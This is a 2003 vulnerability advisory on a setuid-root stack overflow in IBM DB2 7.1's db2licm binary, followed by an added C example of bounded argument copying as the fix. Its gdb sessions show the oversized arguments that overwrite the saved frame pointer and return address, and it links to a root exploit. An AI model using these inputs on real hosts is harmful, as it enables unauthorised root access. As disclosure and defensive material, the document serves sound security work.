Title: Local Vulnerability at db2 7.1 via db2licm binary
Date: 4-08-2003
Platform: Only tested in Linux but can be ported to others.
Impact: Users belonging to the db2iadm1 group in a default installation, or with exec permission over the db2licm binary, can obtain euid=0
Author: Juan Manuel Pascual Escriba
Status: Vendor contacted

PROBLEM SUMMARY:

A stack buffer overflow exists in many parameters (argv[1], -a, -l, -v, ...) of a root setuid binary called db2licm. Only users in the db2iadm1 group can execute this binary in my default installation.

[pask@dimoniet db2licm]$ ls -alc /home/db2inst1/sqllib/adm/db2licm
-r-sr-x---    1 root     db2iadm1    31926 Aug  7  2003 /home/db2inst1/sqllib/adm/db2licm

[pask@dimoniet db2licm]$ gdb /home/db2inst1/sqllib/adm/db2licm
(gdb) r `perl -e 'print "A"x990'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/db2inst1/sqllib/adm/db2licm `perl -e 'print "A"x990'`
(gdb) info reg
...
ebp            0x41414141       0x41414141
esi            0x2      2
edi            0x0      0
eip            0x41414145       0x41414145
...

(gdb) r -a `perl -e 'print "A"x990'`
...
ebp            0x41414141       0x41414141
esi            0x3      3
edi            0x0      0
eip            0x41414145       0x41414145
...

(gdb) r -l `perl -e 'print "A"x990'`
...
ebp            0x41414141       0x41414141
esi            0x3      3
edi            0x0      0
eip            0x41414145       0x41414145
...

(gdb) r -v `perl -e 'print "A"x990'`
...
ebp            0x41414141       0x41414141
esi            0x3      3
edi            0x0      0
eip            0x41414145       0x41414145
...

The saved frame pointer (ebp) and return address (eip) are overwritten with the attacker-controlled bytes, so it is possible to achieve root privileges through this bug.

IMPACT:

Any user with exec permission over db2licm could achieve root privileges. In my default installation only users in db2iadm1 can exec this binary.

SOLUTION:

No workaround.

EXPLOIT

http://concepcion.upv.es/~pask/exploits/IBM-DB2-db2licm.c

--------------------------------------------------

This vulnerability was researched by:

Juan Manuel Pascual Escriba
pask@uninet.edu
Barcelona - Spain
http://concepcion.upv.es/~pask/
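The gdb sessions above show the classic symptom of an unbounded copy of a command-line argument into a fixed-size stack buffer: a 990-byte value overwrites the saved ebp and the return address. The following C program is an added illustration written for this page, not db2licm's source (which is not available here) and not the author's exploit. It models the switches the advisory names (-a, -l, -v and a bare positional argument) and shows the bounded copy that a setuid binary must use for every argv value; the buffer size ARG_BUF_SIZE, the function names and the argument grammar are all assumptions for the demonstration.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Hypothetical fixed-size buffer standing in for the one db2licm copies
 * argv values into; the real size is not stated in the advisory. */
#define ARG_BUF_SIZE 256

/* Bounded copy of an untrusted argument into a fixed buffer.
 * Returns 0 on success, -1 if the argument (plus its NUL) would not fit.
 * A plain strcpy(dst, src) here is the pattern that lets a 990-byte
 * argument run past the buffer into the saved ebp/eip, as the gdb
 * register dumps above show. */
int copy_arg_bounded(char *dst, size_t dstsz, const char *src)
{
    if (dst == NULL || src == NULL || dstsz == 0)
        return -1;
    size_t n = 0;
    while (n < dstsz && src[n] != '\0')  /* never scan past dstsz */
        n++;
    if (n == dstsz)                       /* no room for the terminating NUL */
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Minimal option handling modelled on the switches named in the advisory.
 * Every value, whether it follows -a/-l/-v or is a bare positional
 * argument, goes through the bounded copy. Returns 0 if all arguments
 * were accepted, -1 on the first oversized, missing or unknown one. */
int parse_args(int argc, char **argv, char *out, size_t outsz)
{
    for (int i = 1; i < argc; i++) {
        const char *a = argv[i];
        if (strcmp(a, "-a") == 0 || strcmp(a, "-l") == 0 || strcmp(a, "-v") == 0) {
            if (i + 1 >= argc)
                return -1;                /* switch without a value */
            if (copy_arg_bounded(out, outsz, argv[++i]) != 0)
                return -1;                /* value too long: reject, do not truncate silently */
        } else if (a[0] == '-') {
            return -1;                    /* unknown switch */
        } else {
            if (copy_arg_bounded(out, outsz, a) != 0)
                return -1;
        }
    }
    return 0;
}

/* Constructed test input: `len` bytes of 'A', the equivalent of
 * perl -e 'print "A"x990' used in the advisory. Caller frees. */
char *make_filler(size_t len)
{
    char *s = malloc(len + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'A', len);
    s[len] = '\0';
    return s;
}

int main(int argc, char **argv)
{
    char buf[ARG_BUF_SIZE];
    if (parse_args(argc, argv, buf, sizeof buf) != 0) {
        fprintf(stderr, "argument rejected: too long, missing or unknown\n");
        return 1;
    }
    printf("accepted: %s\n", buf);
    return 0;
}
```

Run it as `./a.out -a $(perl -e 'print "A"x990')` and the oversized value is rejected with a clean exit instead of a corrupted frame; the real fix for a setuid tool is exactly this kind of length check on every argv value (and, where the tool does not need root for argument parsing, dropping privileges before it touches them). An absent `-r-sr-x---` bit on the binary, or group membership in db2iadm1 held only by the DB2 instance accounts, is the configuration-side check a defender can verify until a vendor fix is available.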